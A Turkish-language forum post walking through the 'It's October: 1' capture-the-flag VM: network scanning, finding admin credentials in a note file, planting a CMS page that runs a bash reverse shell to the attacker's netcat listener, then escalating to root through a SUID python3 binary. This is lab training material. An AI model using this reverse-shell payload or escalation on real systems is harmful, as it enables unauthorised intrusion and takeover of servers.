THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

It’s October: 1 Zafiyetli Makinesinin Çözüm

KelHack - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2012
Mesajlar:
27
Konular:
6
Teşekkür (Etti):
29
Teşekkür (Aldı):
28
Ticaret:
(0) %
1
2695
22-04-2020 02:39
#1
Merhabalar TürkHackTeam ailesi, bugün sizlere "It’s October: 1 Zafiyetli Makinesinin Çözümünü" göstereceğim.

Öncelikle zafiyetli makinemizi buradan indirelim
BURADAN

Makine adı: It’s October: 1
Hedef: Hedefin kök bayrağını alın.
Zorluk: Kolay / Orta Seviye
İşletim Sistemi : Linux
Yayınlanma tarihi : 8 Nis 2020
Yapımcı : Akanksha Sachin Verma

Evet arkadaşlar açıklamaları da yaptığımıza göre başlayalım.

İlk önce makinenin ip adresini öğrenelim. Bunun için
Kod:
Netdiscover –r  10.0.2.0/24
( tüm ipleri tarıyoruz) yazıyoruz.



Görüldüğü üzere hedef makine 10.0.2.4 ipsine sahip, birde nmap aracımızı kullanarak açık port taraması yapalım.
Bunun için
Kod:
Nmap –A 10.0.2.4
yazalım.



Tarama bittikten sonra görüyoruz ki Port 22 ssh / Port 80 http / Port 3306 MySQL / Port 8080 apache tomcat portları açık.
Bir web sitesi bandırıldığı düşünerek
Kod:
http://10.0.2.4
adresine gittim.



Sayfa kaynağını incelediğimde burada pek bir bilgi edinemediğimi fark ettim, ardından 8080 portuna yöneldim.
Kod:
http://10.0.2.4:8080
ve gelen sayfayı inceledim.



Buraya geldiğimde sayfa kaynağı incelediğimde ilk ipucumuzu bulduk “mynote.txt” adında bir dosya gördüm bakalım bize ne verecek.
Kod:
http://10.0.2.4:8080/mynote.txt
yazıp enter dediğimizde bize bir kullanıcı adı ve şifre veriyor.



Şimdi anlıyorum ki bir admin paneli var onu bulmalıyız.
Öncelikle sayfamızın bütün dizinlerini taramalıyız. Bunun için terminalde
Kod:
dirb http://10.0.2.4
yazalım ve taramayı başlatalım.



Tarama yaparken bulunan dizinleri denediğim için 2 dizinde giriş ekranını buldum.
Kod:
http://10.0.2.4/backend
yazalım.



Biraz incelediğimizde içerek yönetim paneli olduğu fark ediyoruz. Bulduğum şifreler ile giriş yapalım ve inceleyelim.



Resimde de görüldüğü üzere bir sayfa ekleyebiliyoruz. Lakin bizden sunucuya erişim isteniyor bunun için reverse Shell yapabiliriz. Cms sekmesin “Add” yazan yere tıklayıp yeni sayfa oluşturalım ve size vereceğim kodları yazalım.



İp adresi yazan yere kendi ipimizi ve dinleyeceğimiz portu yazıyoruz.
Kod:
function onstart(){
    exec("/bin/bash -c 'bash -i >& /dev/tcp/ip_adresi/port 0>&1'");
    }
İp adresimizi bilmiyorsak öğrenmek için yeni terminal açıp “ifconfig” yazmamız yeterli.



İnet yazan yerin yanında ip adresimiz yazmaktadır.
Sayfaya bir isim koyup kaydelim ben sayfa adını bash yaptım.
Ben 1234 portuna bağladım, netcat ile 1234 portunu dinlemeye başlayalım. Bunun için yeni terminal açıp
Kod:
nc –lvp 1234
yazalım.



Ve dinlemeye başladık. Yeni oluşturduğumuz sayfayı açalım.
Kod:
http://10.0.2.4/bash
“bash” yazıyorum çünkü sayfa adını öyle yapmıştım. Sizde koyduğunuz sayfa adını yazınız.



Ve ilk bağlantımızı sağlıyoruz.
Kod:
clear
komutu yazalım bir deneme amaçlı.



Gördüğünüz gibi “TERM environment variable not set.” Yazıyor yani ortam değişkeni ayarlanmadı diyor. Ayarlamak içinse
Kod:
 export TERM=screen
yazalım ve ardından “clear” ve “ls –la” yazalım.



Eğer ekranınız böyleyse sorun yoktur. Devam edelim. Şimdi
Kod:
 cd /home
yazıp home klasörüne gidelim ardından
Kod:
ls –la
yazalım.



İşlemlere devam edelim ve
Kod:
cd armour
yazarak armour klasörüne gidelim ve orada “ls –la” yapıp içeriği görelim.



İstediğimiz klasörlere ulaşamadık maalesef. Birde arama yöntemini deneyelim önce
Kod:
clear
yazalım ardından da
Kod:
find / -perm -u=s -type f 2>/dev/null
komutunu girelim




Evet görüldüğü üzere python 3.7 yüklü sunucumuzda artık yetki yükseltme yapalım. Ve kendimizi root konumuna getirelim.
Öncelikle clear yaparak terminali temizleyelim. Daha sonra ise
Kod:
python3 -c 'import os;os.execl("/bin/bash", "bash", "-p")'
komutlarını yazalım id diyerek öğrenelim.



Kod:
clear
yazarak daha devam ediyoruz.
Kod:
python3 -c 'import pty;pty.spawn("/bin/bash")'
komutlarını yazıyoruz. Bu komutla birlikte non-interactive bir shelli interactive bir shelle çevirme işlemini yapıyoruz. Ve bu komutu doğru yaptıysanız ekranınız bu şekilde olmalı.



Burada tekrardan
Kod:
python3 -c 'import os;os.execl("/bin/bash", "bash", "-p")'
komutu çalıştırıyoruz. Ardından
Kod:
 cd /root
yazarak root klasörüne geçiş yapıyoruz.



Evet beklenen an geldi son olarak
Kod:
ls
komutunu çalıştırıyoruz. Hemen ardından
Kod:
cat proof.txt
diyerek flag’ımızı alıyoruz.



Uzun bir konu oldu arkadaşlar. Siber güvenlik alanında daha çok yeniyim. Bazı hatalarım olduysa kusura bakmayın. Bir sonra ki konularda tekrardan görüşmek dileğiyle.
Konu musacalik tarafından (22-04-2020 15:49 Saat 15:49 ) değiştirilmiştir.
Rey, P4RS, S79 MeDuSa Teşekkür etti.
Rey
Rey - ait Kullanıcı Resmi (Avatar)
Haftanın Deneyimli Moderatörü
Üyelik tarihi:
07/2016
Nereden:
Kader
Mesajlar:
2.833
Konular:
611
Teşekkür (Etti):
601
Teşekkür (Aldı):
1273
Ticaret:
(0) %
22-04-2020 02:49
#2
Eline sağlık.
---------------------

Eronmay
KelHack Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler